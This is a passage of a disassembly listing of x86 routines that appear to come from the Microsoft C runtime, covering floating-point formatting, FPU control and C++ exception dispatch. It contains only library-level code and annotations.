sub_41468E endp
; =============== S U B R O U T I N E =======================================
sub_4146B4 proc near ; CODE XREF: sub_414606+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_42E3B0
loc_4146BB: ; CODE XREF: sub_4146B4+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_4146D1
add eax, 8
inc ecx
cmp eax, offset dbl_42E488
jl short loc_4146BB
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4146D1: ; CODE XREF: sub_4146B4+D�j
mov eax, ds:dword_42E3B4[ecx*8]
retn
sub_4146B4 endp
; =============== S U B R O U T I N E =======================================
sub_4146D9 proc near ; CODE XREF: sub_4140A4+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_4146E5
push 5
jmp short loc_4146FB
; ---------------------------------------------------------------------------
loc_4146E5: ; CODE XREF: sub_4146D9+6�j
test al, 8
jz short loc_4146ED
push 1
jmp short loc_4146FB
; ---------------------------------------------------------------------------
loc_4146ED: ; CODE XREF: sub_4146D9+E�j
test al, 4
jz short loc_4146F5
push 2
jmp short loc_4146FB
; ---------------------------------------------------------------------------
loc_4146F5: ; CODE XREF: sub_4146D9+16�j
test al, 1
jz short loc_4146FD
push 3
loc_4146FB: ; CODE XREF: sub_4146D9+A�j
; sub_4146D9+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_4146FD: ; CODE XREF: sub_4146D9+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_4146D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_414706(double)
sub_414706 proc near ; CODE XREF: sub_410CB2:loc_410D38�p
; sub_410DFB:loc_410E81�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_414706 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_414718(double,int)
sub_414718 proc near ; CODE XREF: sub_41479B+82�p
; sub_41479B+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_414718 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414741 proc near ; CODE XREF: sub_410CB2+31�p
; sub_410DFB+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_414758
cmp [ebp+arg_0], edx
jnz short loc_41476A
push 1
jmp short loc_414794
; ---------------------------------------------------------------------------
loc_414758: ; CODE XREF: sub_414741+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_41476A
cmp [ebp+arg_0], edx
jnz short loc_41476A
push 2
jmp short loc_414794
; ---------------------------------------------------------------------------
loc_41476A: ; CODE XREF: sub_414741+11�j
; sub_414741+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_41477D
push 3
jmp short loc_414794
; ---------------------------------------------------------------------------
loc_41477D: ; CODE XREF: sub_414741+36�j
cmp cx, 7FF0h
jnz short loc_414797
test [ebp+arg_4], 7FFFFh
jnz short loc_414792
cmp [ebp+arg_0], edx
jz short loc_414797
loc_414792: ; CODE XREF: sub_414741+4A�j
push 4
loc_414794: ; CODE XREF: sub_414741+15�j
; sub_414741+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_414797: ; CODE XREF: sub_414741+41�j
; sub_414741+4F�j
xor eax, eax
pop ebp
retn
sub_414741 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41479B(double,int)
sub_41479B proc near ; CODE XREF: sub_4143EF+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp ds:dbl_41C790
push esi
fnstsw ax
sahf
jnz short loc_4147BB
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_414851
; ---------------------------------------------------------------------------
loc_4147BB: ; CODE XREF: sub_41479B+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41482A
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_4147D3
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41482A
loc_4147D3: ; CODE XREF: sub_41479B+31�j
fld [ebp+arg_0]
fcomp ds:dbl_41C790
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_4147EB
push 1
pop eax
jmp short loc_4147ED
; ---------------------------------------------------------------------------
loc_4147EB: ; CODE XREF: sub_41479B+49�j
xor eax, eax
loc_4147ED: ; CODE XREF: sub_41479B+4E�j
; sub_41479B+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_414806
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_414800
or dword ptr [ebp+arg_0+4], 1
loc_414800: ; CODE XREF: sub_41479B+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_4147ED
; ---------------------------------------------------------------------------
loc_414806: ; CODE XREF: sub_41479B+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_414814
or byte ptr [ebp+arg_0+7], 80h
loc_414814: ; CODE XREF: sub_41479B+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_414718
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_414851
; ---------------------------------------------------------------------------
loc_41482A: ; CODE XREF: sub_41479B+28�j
; sub_41479B+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_414718
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_414851: ; CODE XREF: sub_41479B+1B�j
; sub_41479B+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_41479B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41485C proc near ; CODE XREF: sub_41413C+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_41485C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41486A proc near ; CODE XREF: sub_41413C+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_41486A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414879 proc near ; CODE XREF: sub_410CB2+13�p
; sub_410CB2+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_414879 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41489C proc near ; CODE XREF: sub_4143EF+1D�p
; sub_4143EF+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_4148B3
fld ds:tbyte_42E4B0
fistp [ebp+arg_0]
wait
loc_4148B3: ; CODE XREF: sub_41489C+B�j
test cl, 8
jz short loc_4148C8
fstsw ax
fld ds:tbyte_42E4B0
fstp [ebp+var_8]
wait
fstsw ax
loc_4148C8: ; CODE XREF: sub_41489C+1A�j
test cl, 10h
jz short loc_4148D7
fld ds:tbyte_42E4BC
fstp [ebp+var_8]
wait
loc_4148D7: ; CODE XREF: sub_41489C+2F�j
test cl, 4
jz short loc_4148E5
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_4148E5: ; CODE XREF: sub_41489C+3E�j
test cl, 20h
jz short locret_4148F0
fldpi
fstp [ebp+var_8]
wait
locret_4148F0: ; CODE XREF: sub_41489C+4C�j
leave
retn
sub_41489C endp
; =============== S U B R O U T I N E =======================================
sub_4148F2 proc near ; CODE XREF: seg000:00410D90�p
push 30000h
push 10000h
call sub_418265
pop ecx
pop ecx
retn
sub_4148F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414904 proc near ; CODE XREF: sub_414942:loc_414966�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_41C7A0
fstp [ebp+var_8]
fld ds:dbl_41C798
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_41C650
fnstsw ax
sahf
jbe short loc_41493E
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_41493E: ; CODE XREF: sub_414904+33�j
xor eax, eax
leave
retn
sub_414904 endp
; =============== S U B R O U T I N E =======================================
sub_414942 proc near ; CODE XREF: seg000:00410D86�p
push offset aKernel32 ; "KERNEL32"
call near ptr 0D00004h
wait
test eax, eax
jz short loc_414966
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_41C0B0
test eax, eax
jz short loc_414966
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_414966: ; CODE XREF: sub_414942+D�j
; sub_414942+1D�j
jmp sub_414904
sub_414942 endp
; =============== S U B R O U T I N E =======================================
sub_41496B proc near ; DATA XREF: sub_410D99+1E�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_412027
cmp eax, 65h
pop ecx
jz short loc_4149AB
loc_41497F: ; CODE XREF: sub_41496B+3E�j
inc esi
cmp ds:dword_42E39C, 1
jle short loc_414998
movsx eax, byte ptr [esi]
push 4
push eax
call sub_413446
pop ecx
pop ecx
jmp short loc_4149A7
; ---------------------------------------------------------------------------
loc_414998: ; CODE XREF: sub_41496B+1C�j
movsx eax, byte ptr [esi]
mov ecx, ds:dword_42E190
mov al, [ecx+eax*2]
and eax, 4
loc_4149A7: ; CODE XREF: sub_41496B+2B�j
test eax, eax
jnz short loc_41497F
loc_4149AB: ; CODE XREF: sub_41496B+12�j
mov cl, ds:byte_42E3A0
mov al, [esi]
mov [esi], cl
inc esi
loc_4149B6: ; CODE XREF: sub_41496B+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_4149B6
pop esi
retn
sub_41496B endp
; ---------------------------------------------------------------------------
loc_4149C5: ; DATA XREF: sub_410D99+5�o
mov eax, [esp+4]
mov dl, ds:byte_42E3A0
mov cl, [eax]
test cl, cl
jz short loc_4149E1
loc_4149D5: ; CODE XREF: seg000:004149DF�j
cmp cl, dl
jz short loc_4149E1
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_4149D5
loc_4149E1: ; CODE XREF: seg000:004149D3�j
; seg000:004149D7�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_414A12
loc_4149E8: ; CODE XREF: seg000:004149F9�j
mov cl, [eax]
test cl, cl
jz short loc_4149FB
cmp cl, 65h
jz short loc_4149FB
cmp cl, 45h
jz short loc_4149FB
inc eax
jmp short loc_4149E8
; ---------------------------------------------------------------------------
loc_4149FB: ; CODE XREF: seg000:004149EC�j
; seg000:004149F1�j ...
mov ecx, eax
loc_4149FD: ; CODE XREF: seg000:00414A01�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_4149FD
cmp [eax], dl
jnz short loc_414A08
dec eax
loc_414A08: ; CODE XREF: seg000:00414A05�j
; seg000:00414A10�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_414A08
locret_414A12: ; CODE XREF: seg000:004149E6�j
retn
; ---------------------------------------------------------------------------
loc_414A13: ; DATA XREF: sub_410D99+28�o
mov eax, [esp+4]
fld qword ptr [eax]
fcomp ds:dbl_41C790
fnstsw ax
sahf
jb short loc_414A28
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_414A28: ; CODE XREF: seg000:00414A22�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A2B proc near ; DATA XREF: sub_410D99+14�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_414A54
lea eax, [ebp+var_8]
push eax
call sub_418728
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_414A54: ; CODE XREF: sub_414A2B+C�j
lea eax, [ebp+arg_8]
push eax
call sub_418755
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_414A2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A69 proc near ; CODE XREF: sub_414CE6+17�p
; sub_414D30+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:byte_45F8A8, 0
push ebx
push esi
jz short loc_414A9E
mov ebx, [ebp+arg_8]
mov eax, ds:dword_45F8A4
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_414D81
pop ecx
pop ecx
jmp short loc_414AD6
; ---------------------------------------------------------------------------
loc_414A9E: ; CODE XREF: sub_414A69+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_4187F9
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_418782
add esp, 14h
loc_414AD6: ; CODE XREF: sub_414A69+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_414AE2
mov byte ptr [eax], 2Dh
inc eax
loc_414AE2: ; CODE XREF: sub_414A69+73�j
test ebx, ebx
jle short loc_414AFA
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, ds:byte_42E3A0
mov eax, edi
pop edi
mov [eax], cl
loc_414AFA: ; CODE XREF: sub_414A69+7B�j
xor ecx, ecx
push offset aE000 ; "e+000"
cmp ds:byte_45F8A8, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_411B70
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_414B21
mov byte ptr [ecx], 45h
loc_414B21: ; CODE XREF: sub_414A69+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_414B66
mov ebx, [esi+4]
dec ebx
jns short loc_414B35
neg ebx
mov byte ptr [ecx], 2Dh
loc_414B35: ; CODE XREF: sub_414A69+C5�j
inc ecx
cmp ebx, 64h
jl short loc_414B4C
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_414B4C: ; CODE XREF: sub_414A69+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_414B63
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_414B63: ; CODE XREF: sub_414A69+E7�j
add [ecx+1], bl
loc_414B66: ; CODE XREF: sub_414A69+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_414A69 endp
; =============== S U B R O U T I N E =======================================
sub_414B6D proc near ; CODE XREF: sub_414D0D+13�p
; sub_414D30+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp ds:byte_45F8A8, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_414BA8
mov eax, ds:dword_45F8AC
mov ebx, [esp+10h+arg_8]
mov esi, ds:dword_45F8A4
cmp eax, ebx
jnz short loc_414BD8
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_414BD8
; ---------------------------------------------------------------------------
loc_414BA8: ; CODE XREF: sub_414B6D+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+18h+var_18]
call sub_4187F9
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_418782
add esp, 14h
loc_414BD8: ; CODE XREF: sub_414B6D+22�j
; sub_414B6D+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_414BE6
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_414BE6: ; CODE XREF: sub_414B6D+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_414BFD
push 1
push edi
call sub_414D81
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_414BFF
; ---------------------------------------------------------------------------
loc_414BFD: ; CODE XREF: sub_414B6D+7E�j
add edi, eax
loc_414BFF: ; CODE XREF: sub_414B6D+8E�j
test ebx, ebx
jle short loc_414C44
push 1
push edi
call sub_414D81
mov al, ds:byte_42E3A0
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_414C44
cmp ds:byte_45F8A8, 0
jz short loc_414C29
neg esi
jmp short loc_414C2F
; ---------------------------------------------------------------------------
loc_414C29: ; CODE XREF: sub_414B6D+B6�j
neg esi
cmp ebx, esi
jl short loc_414C31
loc_414C2F: ; CODE XREF: sub_414B6D+BA�j
mov ebx, esi
loc_414C31: ; CODE XREF: sub_414B6D+C0�j
push ebx
push edi
call sub_414D81
push ebx
push 30h
push edi
call sub_410590
add esp, 14h
loc_414C44: ; CODE XREF: sub_414B6D+94�j
; sub_414B6D+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_414B6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C4B proc near ; CODE XREF: sub_414D30+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_4187F9
mov ds:dword_45F8A4, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov ds:dword_45F8AC, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_418782
mov eax, ds:dword_45F8A4
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp ds:dword_45F8AC, ecx
setl cl
mov ds:byte_45F8B0, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov ds:dword_45F8AC, eax
jl short loc_414CD1
cmp eax, ebx
jge short loc_414CD1
test cl, cl
jz short loc_414CC2
loc_414CB8: ; CODE XREF: sub_414C4B+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_414CB8
and [esi-2], al
loc_414CC2: ; CODE XREF: sub_414C4B+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_414D0D
add esp, 0Ch
jmp short loc_414CE1
; ---------------------------------------------------------------------------
loc_414CD1: ; CODE XREF: sub_414C4B+63�j
; sub_414C4B+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_414CE6
add esp, 10h
loc_414CE1: ; CODE XREF: sub_414C4B+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_414C4B endp
; =============== S U B R O U T I N E =======================================
sub_414CE6 proc near ; CODE XREF: sub_414C4B+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov ds:byte_45F8A8, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_414A69
and ds:byte_45F8A8, 0
add esp, 10h
retn
sub_414CE6 endp
; =============== S U B R O U T I N E =======================================
sub_414D0D proc near ; CODE XREF: sub_414C4B+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov ds:byte_45F8A8, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_414B6D
and ds:byte_45F8A8, 0
add esp, 0Ch
retn
sub_414D0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414D30 proc near ; DATA XREF: sub_410D99�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_414D6B
cmp [ebp+arg_8], 45h
jz short loc_414D6B
cmp [ebp+arg_8], 66h
jnz short loc_414D58
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414B6D
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_414D58: ; CODE XREF: sub_414D30+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414C4B
jmp short loc_414D7C
; ---------------------------------------------------------------------------
loc_414D6B: ; CODE XREF: sub_414D30+7�j
; sub_414D30+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414A69
loc_414D7C: ; CODE XREF: sub_414D30+39�j
add esp, 10h
pop ebp
retn
sub_414D30 endp
; =============== S U B R O U T I N E =======================================
sub_414D81 proc near ; CODE XREF: sub_414A69+2C�p
; sub_414B6D+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_414DA4
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_410B60
inc eax
push eax
push esi
add esi, edi
push esi
call sub_4112D0
add esp, 10h
pop esi
loc_414DA4: ; CODE XREF: sub_414D81+7�j
pop edi
retn
sub_414D81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414DA6 proc near ; CODE XREF: seg000:00410F7C�p
; sub_410FE5+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_414DBC
call sub_415642
loc_414DBC: ; CODE XREF: sub_414DA6+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_414DE4
cmp dword ptr [esi+4], 0
jz short loc_414E3A
cmp [ebp+arg_14], 0
jnz short loc_414E3A
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_4150ED
add esp, 10h
jmp short loc_414E3A
; ---------------------------------------------------------------------------
loc_414DE4: ; CODE XREF: sub_414DA6+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_414E3A
cmp dword ptr [eax], 0E06D7363h
jnz short loc_414E1E
cmp [eax+14h], edi
jbe short loc_414E1E
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_414E1E
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_414E3D
; ---------------------------------------------------------------------------
loc_414E1E: ; CODE XREF: sub_414DA6+4A�j
; sub_414DA6+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_414E41
add esp, 20h
loc_414E3A: ; CODE XREF: sub_414DA6+23�j
; sub_414DA6+29�j ...
push 1
pop eax
loc_414E3D: ; CODE XREF: sub_414DA6+76�j
pop edi
pop esi
pop ebp
retn
sub_414DA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414E41 proc near ; CODE XREF: sub_414DA6+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_414E61
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_414E66
loc_414E61: ; CODE XREF: sub_414E41+16�j
call sub_415642
loc_414E66: ; CODE XREF: sub_414E41+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_414FBD
cmp dword ptr [esi+10h], 3
jnz short loc_414EDA
cmp [esi+14h], edi
jnz short loc_414EDA
cmp dword ptr [esi+1Ch], 0
jnz short loc_414EDA
mov esi, ds:dword_45F8B4
test esi, esi
jz loc_414FB8
mov eax, ds:dword_45F8B8
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_418980
pop ecx
test eax, eax
pop ecx
jnz short loc_414EBC
call sub_415642
loc_414EBC: ; CODE XREF: sub_414E41+74�j
cmp [esi], ebx
jnz loc_414FBD
cmp dword ptr [esi+10h], 3
jnz short loc_414EDA
cmp [esi+14h], edi
jnz short loc_414EDA
cmp dword ptr [esi+1Ch], 0
jnz short loc_414EDA
call sub_415642
loc_414EDA: ; CODE XREF: sub_414E41+41�j
; sub_414E41+46�j ...
cmp [esi], ebx
jnz loc_414FBD
cmp dword ptr [esi+10h], 3
jnz loc_414FBD
cmp [esi+14h], edi
jnz loc_414FBD
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_411133
add esp, 14h
mov ebx, eax
loc_414F11: ; CODE XREF: sub_414E41+162�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_414FA8
cmp [ebx], edi
jg short loc_414F9D
cmp edi, [ebx+4]
jg short loc_414F9D
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_414F9A
loc_414F36: ; CODE XREF: sub_414E41+131�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_414F67
loc_414F48: ; CODE XREF: sub_414E41+124�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_415090
add esp, 0Ch
test eax, eax
jnz short loc_414F76
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_414F48
loc_414F67: ; CODE XREF: sub_414E41+105�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_414F36
jmp short loc_414F9A
; ---------------------------------------------------------------------------
loc_414F76: ; CODE XREF: sub_414E41+119�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4151A1
add esp, 2Ch
loc_414F9A: ; CODE XREF: sub_414E41+F3�j
; sub_414E41+133�j
mov edi, [ebp+var_10]
loc_414F9D: ; CODE XREF: sub_414E41+DE�j
; sub_414E41+E3�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_414F11
